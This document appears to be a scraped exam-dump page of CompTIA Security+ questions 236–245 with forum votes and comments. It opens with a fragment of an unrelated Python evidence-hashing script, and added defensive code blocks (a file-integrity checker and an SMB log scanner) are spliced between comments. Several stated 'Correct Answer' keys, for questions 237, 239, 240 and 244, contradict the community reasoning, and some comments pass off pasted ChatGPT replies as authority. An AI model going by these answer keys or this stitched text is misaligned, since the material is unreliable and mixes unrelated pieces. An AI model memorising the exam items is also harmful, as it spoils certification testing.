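def verify_image(image: bytes, entry: dict) -> bool:
    """Re-hash the working copy and compare with the digest recorded at acquisition."""
    return hmac.compare_digest(sha256_of_stream(io.BytesIO(image)), entry["sha256"])


def make_sample_image() -> bytes:
    """Constructed 3 MiB + 5 byte pseudo-image, sized to cross chunk boundaries."""
    return bytes(range(256)) * (3 * 4096) + b"\x00\x01\x02\x03\x04"


def demo() -> dict:
    image = make_sample_image()
    entry = record_acquisition(image, "examiner-1 (placeholder)", "constructed sample image")
    tampered = bytearray(image)
    tampered[len(image) // 2] ^= 0x01        # a single flipped bit in the working copy
    return {
        "original_verifies": verify_image(image, entry),           # True
        "tampered_verifies": verify_image(bytes(tampered), entry), # False
        "digest": entry["sha256"],
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```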


Question #236 Topic 1

A security analyst is tasked with classifying data to be stored on company servers. Which of the following should be classified as proprietary?

A. Customers’ dates of birth

B. Customers’ email addresses

C. Marketing strategies

D. Employee salaries

Correct Answer: C

Community vote distribution: C (100%)

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: C
“Proprietary Information” shall mean information (whether now existing or hereafter created or acquired) developed, created, or discovered by the
Company, or which became known by, or was conveyed to the Company, which has commercial value in the Company's business.
upvoted 6 times

Dachosenone Highly Voted 3 months, 4 weeks ago


You cannot own people's information, so the only thing left is marketing strategies
upvoted 6 times

MarciaL Most Recent 3 months, 2 weeks ago


B. Customers' email addresses
upvoted 1 times

  NXPERT 3 months, 2 weeks ago


Possibly C, as first two are PII.
upvoted 2 times


Question #237 Topic 1

Which of the following holds staff accountable while escorting unauthorized personnel?

A. Locks

B. Badges

C. Cameras

D. Visitor logs

Correct Answer: C

Community vote distribution: D (53%) B (28%) C (19%)

  [Removed] Highly Voted  3 months, 3 weeks ago


I feel like cameras are more accountable than a logbook.
upvoted 11 times

  FMMIR Highly Voted  1 month, 3 weeks ago


Selected Answer: D
Be careful with this one!

Visitor logs hold staff accountable while escorting unauthorized personnel. A visitor log is a record of individuals who enter a facility, and it
typically includes details such as the date and time of the visit, the name of the visitor, and the name of the staff member who escorted them. By
maintaining a visitor log, it is possible to track who has entered the facility and who was responsible for escorting them. This can help to hold
staff accountable for escorting unauthorized personnel and ensure that they are following security protocols and procedures. Locks, badges, and
cameras are all important security measures, but they are not directly related to holding staff accountable for escorting unauthorized personnel.
upvoted 9 times

  zf1343 2 weeks, 6 days ago


A "visitor" doesn't quite fit well within "unauthorized personnel" term. The person needing escort most likely has already been issued a badge
to be at work.
upvoted 1 times

  ronniehaang Most Recent  4 days ago


Selected Answer: D
D. Visitor logs holds staff accountable while escorting unauthorized personnel. A visitor log is a document used to record details of visitors who
enter an organization or site. It helps in monitoring who has entered the organization, when, and for what purpose. In the context of escorting
unauthorized personnel, visitor logs can help hold staff accountable by providing evidence of who was present during the escort, the time of the
escort, and any other relevant details. This information can be useful in case of any security breach or violation of security policies, and can help
in conducting an investigation and determining the responsible parties.
upvoted 1 times

  Sandon 1 week, 2 days ago


Selected Answer: C
According to ChatGPT

Cameras can hold staff accountable while escorting unauthorized personnel. The presence of cameras can act as a deterrent for staff to engage
in any misconduct, and in case of any incidents, the footage can be used as evidence to hold the staff accountable for their actions. Cameras
can provide real-time monitoring, and recorded footage can be used to review the actions of the staff and the unauthorized personnel, which can
help to identify any security breaches and hold the responsible parties accountable.

Locks, Badges and Visitor logs are security measures that can help in controlling access to a facility, but they do not hold staff accountable while
escorting unauthorized personnel.
Locks can secure a facility, but they can't record staff action.
Badges are used to identify authorized personnel, but they don't record staff action.
Visitor logs are used to track visitors, but they don't record staff action.
upvoted 1 times

  sanlibo 1 week, 2 days ago


Why ChatGPT? use Comptia office guide.
upvoted 2 times

  Ranaer 4 days ago


Because he is completely incompetent and can either post ChatGPT answers or say "that aint it buddy" to everyone who disagrees with
him on a question.
No actual attempt at reasoning or explanation, just acting smug.
upvoted 1 times


  Nirmalabhi 1 week, 4 days ago


this is one fucked up Q. seriously
upvoted 3 times

  sanlibo 2 weeks ago


Selected Answer: B
ID badge showing name and (perhaps) access details is one of the cornerstones of building security. Anyone moving through secure areas of a building should be wearing an ID badge; anyone without an ID badge should be challenged. Color-coding could be used to make it obvious to which zones a badge is granted access.

Lesson 21: Explaining Physical Security | Topic 21A
upvoted 1 times

  diegomatheus00 2 weeks, 1 day ago


Selected Answer: C
I believe C is the correct answer.
upvoted 1 times

  nicekoda 1 month, 1 week ago


The answer is C. The emphasis is ..... while escorting unauthorized personnel. A visitor log must be filled before escorting the unauthorized
personnel. In this case, it is the camera that captures who was doing the escorting.
upvoted 1 times

  okay123 1 month, 3 weeks ago


Selected Answer: B
"Which of the following holds staff accountable while escorting unauthorized personnel?"

Obviously, if a security guard is escorting someone off the premises, they have some authority of some kind to do that. An identifiable badge. You
can use a cop for example, tomato tomanto you get my point!
upvoted 1 times

  Jimbobilly 1 month, 4 weeks ago


Selected Answer: C
I'm going with C as well. To hold someone accountable you need proof they did something. Cameras don't lie.
upvoted 2 times

  Reese20_14 2 months, 2 weeks ago


I wanted to pick Cameras on this one, but after looking into it, the Badges answer makes sense. Why? Because anyone who is holding a Badge
that authorizes them as an escort will be held accountable if the individual they are escorting compromises security.

Sure, a camera is going to record whatever happens, but it's not going to hold anyone accountable.
upvoted 1 times

  babyzilla 2 months, 2 weeks ago


Selected Answer: B
There are no cameras where I work. Locks wouldn't make sense. That leaves logs and badges. Logs can easily be manipulated. Badges can help
with non-repudiation too.
upvoted 2 times

  kstevens11 2 months, 4 weeks ago


Selected Answer: C
I took "while escorting" as the keywords, and cameras are deterrent at least (CCTV) and can hold you accountable if they are recording, as well.
How do badges hold you accountable? I'm probably missing the point there.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: B
I'm going with badges. No badge, no access. A camera isn't holding you accountable because only security personnel can see that. And, at the
time of escorting, you aren't looking at cameras as a regular employee.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


It is definitely NOT a logbook. Electronic or not. I can lie about my name easily.
upvoted 1 times

  Picvet 3 months, 1 week ago


I've never seen a visitors log that gives you an option to write the name of the person escorting you. Just saying.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: D
Badges only keep visitors accountable. A log will tell you who's the assigned escort
upvoted 6 times

Dachosenone 3 months, 3 weeks ago
"Badges, We don't need no stinking badges."
upvoted 3 times


Question #238 Topic 1

An organization’s Chief Security Officer (CSO) wants to validate the business’s involvement in the incident response plan to ensure its validity and
thoroughness. Which of the following will the CSO MOST likely use?

A. An external security assessment

B. A bug bounty program

C. A tabletop exercise

D. A red-team engagement

Correct Answer: C

Community vote distribution: C (60%) A (33%) 7%

  alwaysrollin247 1 month, 1 week ago


Selected Answer: D
A red team consists of security professionals who act as adversaries to overcome cyber security controls. Red teams often consist of
independent ethical hackers who evaluate system security in an objective manner.

They utilize all the available techniques to find weaknesses in people, processes, and technology to gain unauthorized access to assets. As a
result of these simulated attacks, red teams make recommendations and plans on how to strengthen an organization’s security posture.

https://purplesec.us/red-team-vs-blue-team-cyber-security/
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 2 times

  zf1343 2 weeks, 6 days ago


Question is not asking to identify vulnerabilities or exploit security weaknesses. It's about incident response plan.
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The CSO is most likely to use a tabletop exercise to validate the organization's involvement in the incident response plan. A tabletop exercise is a
type of simulation that involves a group of participants discussing and responding to a hypothetical security incident. The scenario is typically
discussed in a group setting, with participants representing different roles and departments within the organization. The goal of a tabletop
exercise is to assess the organization's readiness to respond to a security incident, identify any gaps or weaknesses in the incident response
plan, and determine how effectively different teams and individuals can work together to respond to the incident
upvoted 3 times

  J_Ark1 2 months, 3 weeks ago


Selected Answer: C
It's internal, so my vote is deciding here; I agree with C :)
upvoted 1 times

  Sir_Learnalot 3 months ago


Selected Answer: C
I'd go with C as you want to check for the "business's involvement". An external entity might not be involved with your actual business. With a
tabletop exercise you can get the people involved with the response procedure who will actually have to do something when an incident occurs
and know the business best and the impact that an incident would have on it.
upvoted 1 times

  Ron9481 3 months, 2 weeks ago


Selected Answer: C
I think C. This job can be accomplished with a tabletop exercise. It is within the CSO's capability. Anything external would need approval from
the boss and require more resources. Just my opinion.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Selected Answer: A
Tabletop is more for practice
upvoted 2 times


  alayeluwa 3 months, 3 weeks ago


Selected Answer: A
An external body that will not be biased about any of the team member’s capability will get the job done, Mr. CSO.
upvoted 3 times

  Kashim 3 months, 3 weeks ago


Selected Answer: C
C correct
upvoted 3 times

  [Removed] 3 months, 3 weeks ago


Care to offer any reasoning? Because to truly test the validity of their incident response plan I would hire an external security assessment.
upvoted 5 times


Question #239 Topic 1

Which of the following documents provides guidance regarding the recommended deployment of network security systems from the
manufacturer?

A. Cloud control matrix

B. Reference architecture

C. NIST RMF

D. CIS Top 20

Correct Answer: D

Community vote distribution: B (100%)

  dansecu Highly Voted  3 months, 4 weeks ago


Selected Answer: B
Correct answer is B, because the vendors are responsible for their products and solutions and they are providing reference architectures.
CIS Top 20 is a security controls framework.
upvoted 10 times

  [Removed] Highly Voted  3 months, 3 weeks ago


Selected Answer: B
A reference architecture is a document or set of documents that provides recommended structures and integrations of IT products and services
to form a solution.
upvoted 5 times

  ronniehaang Most Recent  4 days ago


Selected Answer: B
B. Reference Architecture

A reference architecture provides a blueprint for deploying a specific technology solution, including the network security systems. It outlines the
recommended deployment architecture, components, and technologies that are necessary for a secure and effective deployment of the solution.
The reference architecture provides step-by-step instructions on how to implement the solution, ensuring that all necessary security measures
are taken and that the deployment is done in the most secure manner possible. It provides best practices, design patterns, and guidelines to help
organizations ensure the security and stability of their network security systems.
upvoted 1 times

  asum 2 weeks, 4 days ago


Enterprise reference architecture (ea.cloudsecurityalliance.org)—best practice
methodology and tools for CSPs to use in architecting cloud solutions. The
solutions are divided across a number of domains, such as risk management and
infrastructure, application, and presentation services.
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


It's kind of impossible to find something on the internet that talks about this reference architecture thing. Compared to CIS Top 20, which talks about
network security, it looks like a better answer for CIS Top 20. But who knows.. I could be wrong..
upvoted 1 times

  carpathia 2 months, 1 week ago


I am not sure about this ref arch. I have actually found it in Conklin's book, but under Cloud Security, pg 587
upvoted 1 times

  carpathia 2 months, 3 weeks ago


I haven't seen this Reference Architecture in any of the CompTIA books, videos etc. It doesn't mean it doesn't exist and can be used in the exam.
upvoted 2 times

  G4ct756 3 months, 1 week ago


Selected Answer: B
Definitely B.
For example : aws's Reference Architecture Examples and Best Practices site.
https://aws.amazon.com/architecture/
- includes best practices , example and recommendations for aws environment usage.
upvoted 2 times

  Mahougbe 3 months, 1 week ago


Selected Answer: B
Answer is B
upvoted 2 times

  passmemo 3 months, 3 weeks ago


Selected Answer: B
A reference architecture is a document or set of documents that provides recommended structures and integrations of IT products and services
to form a solution.
upvoted 4 times

  CertAddict69 3 months, 3 weeks ago


Selected Answer: B
Answer is B.
upvoted 3 times

  ksave 3 months, 3 weeks ago


Selected Answer: B
Reference architecture provides best security practices
upvoted 4 times


Question #240 Topic 1

During a recent security assessment, a vulnerability was found in a common OS. The OS vendor was unaware of the issue and promised to release
a patch within the next quarter. Which of the following BEST describes this type of vulnerability?

A. Legacy operating system

B. Weak configuration

C. Zero day

D. Supply chain

Correct Answer: A

Community vote distribution: C (83%) A (17%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: C
"OS vendor was unaware" it indicates Zero Day
upvoted 12 times

  JohnMangley Highly Voted  3 months, 3 weeks ago


Selected Answer: C
It sounds like a Zero day as the OS vendor was unaware of the vulnerability.
upvoted 5 times

  Action Most Recent  15 hours, 23 minutes ago


I was wondering if this can be supply chain since is coming from an OS Vendor
upvoted 1 times

  Action 15 hours, 21 minutes ago


If supply chain isn't the answer then I'll go with Zero day because option A means it's an outdated OS and usually without vendor support;
clearly the OS in question still has vendor support
upvoted 1 times

  Alizadeh 1 month, 2 weeks ago


Selected Answer: C
The correct answer is C. Zero day.

A zero-day vulnerability is a previously unknown vulnerability in software or hardware that is exploited by attackers before the vendor becomes
aware of the issue and releases a patch. In this case, the OS vendor was unaware of the vulnerability and promised to release a patch within the
next quarter, indicating that it is a zero-day vulnerability.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


A. Legacy is the answer…
upvoted 1 times

  Sandon 1 month, 2 weeks ago


No, it's not
upvoted 1 times

  Lv2023 1 month, 3 weeks ago


Selected Answer: C
Answer is "C" as per Comptia this is why "A" is not the answer:
A legacy platform is one that is no longer supported with security patches by its developer or vendor. This could be a PC/laptop/smartphone,
networking appliance, peripheral device, Internet of Things device, operating system, database/programming environment, or software
application. By definition, legacy platforms are unpatchable.
upvoted 1 times

  ksave 3 months ago


Selected Answer: A
My answer would be Legacy OS. Reason: The question said the patch would be available in the next quarter. This sounds more of EOL. For zero
day attacks, the solution must come in the next 2 to 3 days.
upvoted 4 times

  Sandon 1 week, 2 days ago


You are incorrect sir. There is no time limit for a zero-day patch

upvoted 1 times

NICKJONRIPPER 2 months, 1 week ago
Not in widespread use? Not the case, they are still using it
upvoted 1 times

  NICKJONRIPPER 2 months, 1 week ago


legacy operating system, is an operating system (OS) no longer in widespread use, or that has been supplanted by an updated version of
earlier technology.
upvoted 1 times

  papisam 3 months, 1 week ago


but if they promised to release a patch then it can not be Zero Day.
upvoted 4 times

  Sandon 1 week, 2 days ago


Wrong, now that they know about it, it is no longer a zero-day. But it was
upvoted 1 times

  Iphy23 3 months, 2 weeks ago


I still don't understand why the answers on this forum are wrong compared to the votes...
upvoted 2 times

  SOK_I 2 months, 2 weeks ago


I saw on the answer threads in the early 100ish answers that Examtopics has to keep the *actual* answer hidden, otherwise CompTIA would
not allow Examtopics to post their questions verbatim.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


And we never will.
upvoted 1 times


Question #241 Topic 1

Which of the following is a targeted attack aimed at compromising users within a specific industry or group?

A. Watering hole

B. Typosquatting

C. Hoax

D. Impersonation

Correct Answer: A

Community vote distribution


A (100%)

  Gino_Slim Highly Voted  3 months, 1 week ago


Selected Answer: A
Through process of elimination alone it's A.

If you end up getting stuck on a CompTIA test remember this:

- A completely wrong answer
- A correct answer
- A CompTIA correct answer (the one you want)
- An answer that sounds good because you didn't study
upvoted 9 times

  Skelter117 Highly Voted  3 months, 2 weeks ago


Selected Answer: A
Watering hole is correct but if they change the answers to spear phishing being one, that may be the new answer just a heads up.
upvoted 7 times

  passmemo Most Recent  3 months, 3 weeks ago


Selected Answer: A
A watering hole attack is a targeted attack designed to compromise users within a specific industry or group of users by infecting websites they
typically visit and luring them to a malicious site.
upvoted 5 times

  serginljr 3 months, 4 weeks ago


Selected Answer: A
A correct
upvoted 5 times


Question #242 Topic 1

To reduce and limit software and infrastructure costs, the Chief Information Officer has requested to move email services to the cloud. The cloud
provider and the organization must have security controls to protect sensitive data. Which of the following cloud services would BEST
accommodate the request?

A. IaaS

B. PaaS

C. DaaS

D. SaaS

Correct Answer: B

Community vote distribution


B (55%) D (45%)

  Kashim Highly Voted  3 months, 3 weeks ago


Selected Answer: B
"The cloud provider and the organization must have security controls to protect sensitive data." If you want to have some part of administrative
control, you have to go with PaaS. SaaS is not enough in this case.
upvoted 11 times

  Sandon 1 week, 2 days ago


"Software and infrastructure" = SaaS
upvoted 1 times

  Knowledge33 2 months, 3 weeks ago


I disagree. According to CompTIA, PaaS only allows the client to manage its database, but with SaaS, they can't. O365 is a SaaS, and the client can
manage the security policy.
upvoted 1 times

  andrizo 3 months, 3 weeks ago


Have, not implement
upvoted 1 times

  Dachosenone Highly Voted  3 months, 3 weeks ago


"SaaS allows people to use cloud-based web applications. In fact, email services such as Gmail and Hotmail are examples of cloud-based SaaS
services."
upvoted 8 times

  ronniehaang Most Recent  4 days ago


Selected Answer: D
D. SaaS (Software as a Service) is the best option to accommodate the request to move email services to the cloud while protecting sensitive
data. SaaS is a delivery model for software applications where the provider hosts the application and makes it available to customers over the
internet. SaaS provides customers with the benefits of cloud computing such as scalability, low cost, and quick implementation without the need
for expensive hardware, software, and support infrastructure. SaaS providers also have security controls in place to protect sensitive data, such
as encryption, data backup, and disaster recovery. With SaaS, the customer's sensitive data is stored and processed on the provider's
infrastructure, reducing the customer's responsibility for securing the data and providing peace of mind.
upvoted 1 times

  Sandon 1 week, 2 days ago


Selected Answer: D
According to ChatGPT

D. SaaS (Software as a Service)

SaaS (Software as a Service) is a cloud service model that allows organizations to access and use software applications over the internet,
without having to maintain or support the underlying infrastructure. SaaS providers are responsible for maintaining and updating the software and
infrastructure, which can help to reduce and limit software and infrastructure costs. In the case of email services, a SaaS provider would host and
manage the email system, including security controls to protect sensitive data.

IaaS (Infrastructure as a Service) provides virtualized computing resources over the internet, it doesn't cover email services.
PaaS (Platform as a Service) provides a platform for the development, running and management of applications, it doesn't cover email services.
DaaS (Desktop as a Service) provides virtualized desktop environments, it doesn't cover email services.
upvoted 1 times

  Ranaer 3 days, 23 hours ago


And upon further questioning, such as:


However in the question it is explicitly stated that the organizations MUST be able to place security controls to protect sensitive data. While
SaaS offers some security controls, its vastly limited in comparison to PaaS.

ChatGPT answers:
Yes, that is correct. When the requirement is to have security controls in place to protect sensitive data, PaaS (Platform as a Service) would
likely be a better fit than SaaS (Software as a Service), as PaaS provides a more flexible and customizable environment for organizations to
deploy and manage their applications and security controls. With PaaS, the organization can control the infrastructure, middleware, and
security measures to meet its specific requirements for protecting sensitive data. On the other hand, with SaaS, the organization relies on the
cloud provider to manage and secure the infrastructure, middleware, and security measures, which may not meet the organization's specific
needs and requirements.
upvoted 1 times

  MattClark_7 2 weeks, 2 days ago


Selected Answer: B
SaaS is a bespoke vendor application that cannot be modified; you use it with a pay-per-use model, as a subscription, and you cannot
migrate any applications or services to any SaaS environment. So the answer cannot be D. In the question it states they would like to move their
current email service to the cloud. This is not possible with SaaS. However, with PaaS you could migrate your custom software applications.
3. The goal of all of this is to reduce costs. SaaS is a more expensive option as it is a subscription service that is provided by the CSP through
a web server.
Ref: Ian Neil CompTIA Security+: SY0-601 Certification Guide Second Edition
upvoted 1 times

  Sandon 1 week, 2 days ago


That ain't it buddy
upvoted 1 times

  nicekoda 1 month, 1 week ago


Answer is B. According to the UK's National Cyber Security Centre (NCSC) SaaS security rules, the client and the service provider or software
distributor must share security responsibilities.
upvoted 2 times

  Ranaer 1 month, 2 weeks ago


Selected Answer: B
I believe the answer to be B simply because it is explicitly said that "organization must have security controls". With SaaS you are sacrificing a
bigger part of that control, if not almost all, with PaaS you keep some of that control to be able to enforce some of the rules which you need.
upvoted 1 times

  viksap 1 month, 2 weeks ago


Selected Answer: D
SaaS provides a complete service.
upvoted 1 times

  [Removed] 1 month, 3 weeks ago


Selected Answer: B
Definitely PaaS
upvoted 1 times

  Sanjucbsa 1 month, 3 weeks ago


Selected Answer: D
https://www.bigcommerce.com/articles/ecommerce/saas-vs-paas-vs-iaas/
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: D
The best option to accommodate the request would be to use a Software as a Service (SaaS) provider for email services. SaaS providers
typically offer a variety of security controls to protect sensitive data and can help reduce and limit software and infrastructure costs by providing
email services on a subscription basis. IaaS, PaaS, and DaaS are all different types of cloud services that may not be as well suited for this
particular use case.
upvoted 1 times

  Lv2023 1 month, 3 weeks ago


Selected Answer: B
PaaS meets the requirement that both the service provider and the organization have their respective controls.
upvoted 2 times

  Pgvicky 1 month, 4 weeks ago


I saw limit and reduce software so I went with PaaS
upvoted 1 times

  Nome02 2 months ago


Correct D - SaaS is the best and only choice as it is currently being used in the industry for email services.
upvoted 1 times

  Nome02 2 months ago



And to those who are saying SaaS doesn't allow security: you can configure SaaS services in a variety of ways using encryption, enhanced
authentication, SSPM, etc.
upvoted 1 times

  tek7ila 2 months ago


Selected Answer: B
Hard question, but with SaaS you have no control over security so I would go with PaaS.
upvoted 2 times

  Cavs_ 2 months ago


Selected Answer: D
It's D
https://rubygarage.org/blog/iaas-vs-paas-vs-saas#:~:text=In%20fact%2C%
upvoted 1 times

  mmains 2 months, 1 week ago


Selected Answer: B
IaaS provides you the most freedom of control as it lets you manage your applications, data, middleware, and operating system. On the other
hand, PaaS allows you to manage your data and applications only, and with SaaS, everything is managed by your service provider.
upvoted 2 times


Question #243 Topic 1

A security engineer is concerned that the strategy for detection on endpoints is too heavily dependent on previously defined attacks. The engineer
would like a tool to monitor for changes to key files and network traffic on the device. Which of the following tools BEST addresses both detection
and prevention?

A. NIDS

B. HIPS

C. AV

D. NGFW

Correct Answer: B

Community vote distribution


B (86%) 14%

  passmemo Highly Voted  3 months, 3 weeks ago


Selected Answer: B
A host-based intrusion detection and prevention system (HIPS) is a tool that monitors for changes to key files and network traffic on a device.
upvoted 7 times
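
The "changes to key files" part of what a HIPS does is a file-integrity check: take a baseline of digests for the monitored files, then re-scan and report anything modified, added or removed. The block below is an added illustration, not code from the page or from any HIPS product; it builds a throwaway directory tree with a few constructed files so it runs offline, and the tampering it detects is simulated in `demo()`.

```python
"""File-integrity check of the kind a HIPS performs on key files.

Added example, not from the original page or any HIPS product. It keeps a
baseline of SHA-256 digests for every file under a monitored root and
reports each file that was modified, added or removed since the baseline.
The monitored files are constructed in a temporary directory.
"""
import hashlib
import tempfile
from pathlib import Path


def sha256_of(path: Path) -> str:
    """Hash a file in chunks so large files never have to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def build_baseline(root: Path) -> dict:
    """Map every regular file under root (POSIX-style relative path) to its digest."""
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file():
            baseline[p.relative_to(root).as_posix()] = sha256_of(p)
    return baseline


def compare(baseline: dict, current: dict) -> dict:
    """Classify the differences between two snapshots of the same tree."""
    return {
        "modified": sorted(f for f in baseline if f in current and baseline[f] != current[f]),
        "added": sorted(f for f in current if f not in baseline),
        "removed": sorted(f for f in baseline if f not in current),
    }


def demo() -> dict:
    """Constructed scenario: baseline a small 'etc' tree, then tamper with it."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        (root / "etc").mkdir()
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n")
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "etc" / "motd").write_text("welcome\n")
        baseline = build_baseline(root)

        # Simulated changes after the baseline was taken: one file edited,
        # one scheduled job dropped in, one file deleted (all constructed).
        (root / "etc" / "hosts").write_text("127.0.0.1 localhost\n203.0.113.9 update.example\n")
        (root / "etc" / "cron.d").mkdir()
        (root / "etc" / "cron.d" / "job").write_text("* * * * * root /tmp/x\n")
        (root / "etc" / "motd").unlink()

        return compare(baseline, build_baseline(root))


if __name__ == "__main__":
    for kind, files in demo().items():
        print(f"{kind}: {files}")
```

A real agent would store the baseline somewhere the monitored host cannot silently rewrite it and re-run the comparison on a schedule or on file-system events; the comparison logic itself is the part shown here.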

  Jimbobilly Most Recent  1 month, 3 weeks ago


Selected Answer: B
It's HIPS
upvoted 1 times

  FMMIR 1 month, 3 weeks ago


Selected Answer: B
The best tool for monitoring changes to key files and network traffic on a device, as well as providing detection and prevention capabilities, is a
host-based intrusion prevention system (HIPS). A HIPS monitors changes to key files and network traffic on a single device, and can detect and
prevent malicious activities by comparing the current state of the system to a known good state. In contrast, a network-based intrusion detection
system (NIDS) only monitors network traffic for signs of malicious activity and does not provide prevention capabilities. An antivirus (AV) program
only detects and removes malware from a device, and does not monitor changes to key files or network traffic. A next-generation firewall (NGFW)
monitors and controls network traffic, but does not provide the detailed monitoring and prevention capabilities of a HIPS.
upvoted 1 times

  J_Ark1 2 months, 3 weeks ago


why not d, next gen firewall?
upvoted 1 times

  JStevie 2 months, 2 weeks ago


I believe it's not NGFW because the question states it wants to monitor changes on the device itself, not the entire network. The only other
option that can detect and prevent is HIPS
upvoted 2 times

  03allen 3 months, 1 week ago


Selected Answer: A
Why not a NIDS?

A network-based intrusion detection system (NIDS) detects malicious traffic on a network. NIDS usually require promiscuous network access in
order to analyze all traffic, including all unicast traffic.
upvoted 2 times

  Sir_Learnalot 3 months ago


It would not meet all criteria asked in the question, as a NIDS is not able to monitor key files on an endpoint.
upvoted 1 times

  Granddude 3 months, 3 weeks ago


Selected Answer: B
A host-based intrusion prevention system (HIPS) is a system or a program employed to protect critical computer systems containing crucial data
against viruses and other Internet malware. Starting from the network layer all the way up to the application layer, HIPS protects from known and
unknown malicious attacks.
upvoted 3 times


Question #244 Topic 1

During a recent incident, an external attacker was able to exploit an SMB vulnerability over the internet. Which of the following action items should
a security analyst perform FIRST to prevent this from occurring again?

A. Check for any recent SMB CVEs.

B. Install AV on the affected server.

C. Block unneeded TCP 445 connections.

D. Deploy a NIDS in the affected subnet.

Correct Answer: A

Community vote distribution


C (100%)

  Kashim Highly Voted  3 months, 4 weeks ago


Selected Answer: C
C. Block unneeded TCP 445 connections. - only blocking unneeded SMB can have "preventive" character.
upvoted 9 times
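
Before the analyst can block the unneeded TCP 445 connections, they need to know which hosts were accepting SMB from the internet in the first place. The block below is an added example, not from the page: it runs over a handful of constructed firewall log lines (the key=value layout is made up, not any vendor's format) and flags accepted TCP/445 connections whose source is outside the RFC 1918, loopback and link-local ranges, then lists the internal hosts that were reachable that way.

```python
"""Find internet-sourced SMB (TCP 445) connections in firewall logs.

Added example, not from the original page. The log format is a constructed
key=value style. A line is flagged when the firewall ACCEPTed TCP traffic
to port 445 from a source that is not in a private, loopback or link-local
range. Only the accepted lines matter: dropped ones were already blocked.
"""
import ipaddress

# Constructed sample log lines (TEST-NET addresses stand in for the internet)
SAMPLE_LOG = """\
2023-02-04T07:26:01Z action=ACCEPT proto=TCP src=198.51.100.23 spt=51022 dst=10.0.5.12 dpt=445
2023-02-04T07:26:02Z action=ACCEPT proto=TCP src=10.0.1.40 spt=49877 dst=10.0.5.12 dpt=445
2023-02-04T07:26:03Z action=DROP proto=TCP src=203.0.113.7 spt=40001 dst=10.0.5.12 dpt=445
2023-02-04T07:26:04Z action=ACCEPT proto=TCP src=203.0.113.7 spt=40002 dst=10.0.5.12 dpt=443
2023-02-04T07:26:05Z action=ACCEPT proto=UDP src=192.0.2.9 spt=137 dst=10.0.5.12 dpt=445
2023-02-04T07:26:06Z action=ACCEPT proto=TCP src=192.0.2.9 spt=41000 dst=10.0.5.13 dpt=445
"""

SMB_PORT = 445

# Ranges treated as "inside"; TEST-NET blocks are deliberately not listed
# because they play the role of external addresses in the sample.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8", "169.254.0.0/16")]


def parse_line(line: str) -> dict:
    """Split 'timestamp k=v k=v ...' into a dict; the timestamp lands under 'ts'."""
    ts, _, rest = line.partition(" ")
    fields = dict(kv.split("=", 1) for kv in rest.split())
    fields["ts"] = ts
    return fields


def is_external(ip_text: str) -> bool:
    ip = ipaddress.ip_address(ip_text)
    return not any(ip in net for net in INTERNAL_NETS)


def find_exposed_smb(log_text: str) -> list:
    """Return (timestamp, external source, internal destination) for every
    accepted TCP/445 connection from outside."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        if (f["action"] == "ACCEPT" and f["proto"] == "TCP"
                and int(f["dpt"]) == SMB_PORT and is_external(f["src"])):
            hits.append((f["ts"], f["src"], f["dst"]))
    return hits


def exposed_hosts(hits: list) -> list:
    """Internal hosts that need a rule restricting 445 to internal sources."""
    return sorted({dst for _, _, dst in hits})


if __name__ == "__main__":
    found = find_exposed_smb(SAMPLE_LOG)
    for ts, src, dst in found:
        print(f"{ts} external {src} reached SMB on {dst}")
    print("hosts to restrict:", exposed_hosts(found))
```

The UDP line and the port-443 line are left alone on purpose: the question is about SMB over TCP, and a check that also flagged NetBIOS or HTTPS would send the analyst chasing the wrong rule.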

  Tuncyber Most Recent  1 month, 2 weeks ago


A. Because it is important to know which vulnerabilities are warned and reported.
upvoted 2 times

  Sir_Learnalot 3 months ago


Selected Answer: C
I'd also go with C.
upvoted 2 times

  Gino_Slim 3 months, 1 week ago


Selected Answer: C
I'm going with C here too.
upvoted 2 times

  KelvinNguyen3011 3 months, 3 weeks ago


I agree with C.
upvoted 2 times

  JohnMangley 3 months, 3 weeks ago


Selected Answer: C
Blocking unneeded TCP 445 connections should be performed FIRST as it would prevent the SMB vulnerability from being used.
upvoted 4 times


Question #245 Topic 1

A penetration tester is fuzzing an application to identify where the EIP of the stack is located on memory. Which of the following attacks is the
penetration tester planning to execute?

A. Race-condition

B. Pass-the-hash

C. Buffer overflow

D. XSS

Correct Answer: C

Community vote distribution


C (100%)

  FMMIR 1 month, 3 weeks ago


Selected Answer: C
The penetration tester is planning to execute a buffer overflow attack. A buffer overflow attack is a type of security vulnerability that occurs when
a program attempts to write data to a memory buffer that is too small to hold it. This can cause the program to crash or, in some cases, allow an
attacker to execute arbitrary code. One way to identify where the EIP of the stack is located on memory is to use a technique called fuzzing,
which involves sending large amounts of data to an application in order to identify areas where the application is vulnerable to buffer overflow
attacks.
upvoted 2 times

  Knowledge33 2 months, 4 weeks ago


EIP is a register in x86 architectures (32bit). It holds the "Extended Instruction Pointer" for the stack. In other words, it tells the computer where to
go next to execute the next command and controls the flow of a program.
upvoted 3 times

  ostralo 3 months, 2 weeks ago


EIP stands for Extended Instruction Pointer and is used to track the address of the current instruction running inside the application.
upvoted 1 times

  ostralo 3 months, 2 weeks ago


https://security.stackexchange.com/questions/129499/what-does-eip-stand-for

EIP - 33

